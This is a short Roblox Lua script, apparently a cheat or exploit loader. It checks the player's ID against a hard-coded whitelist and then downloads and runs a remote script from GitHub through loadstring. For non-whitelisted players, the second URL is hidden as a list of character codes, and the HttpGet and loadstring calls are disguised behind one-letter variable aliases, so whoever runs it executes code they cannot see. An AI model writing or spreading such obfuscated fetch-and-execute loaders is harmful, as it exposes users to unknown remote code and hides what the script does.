-- Define the list of allowed user IDs
local allowedIDs = {2425974901, 1809192714, 16875091, 125449922, 3340760443}

-- Get the ID of the local player
local userID = game.Players.LocalPlayer.UserId

-- Check if the ID is in the list of allowed IDs
local isAllowed = false
for _, id in ipairs(allowedIDs) do
    if userID == id then
        isAllowed = true
        break
    end
end

-- Debugging: print the value of isAllowed to the console
print("isAllowed:", isAllowed)

-- Execute the script depending on whether the ID is allowed or not
if isAllowed then
    -- Load the script from the first URL
    loadstring(game:HttpGet('https://raw.githubusercontent.com/amagineLost/for-losers/main/Protected.lua%20(3).txt'))()
else
    -- Load the script from the second URL
    local a = {104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 108, 111, 115, 116, 98, 117, 110, 110, 121, 52, 56, 57, 47, 102, 114, 101, 101, 98, 105, 101, 47, 109, 97, 105, 110, 47, 67, 111, 100, 101}
    local b = ''
    for c, d in ipairs(a) do
        b = b .. string.char(d)
    end
    local e = loadstring
    local f = game
    local g = 'HttpGet'
    local h = f[g]
    local i = true
    e(h(b, i))()
end
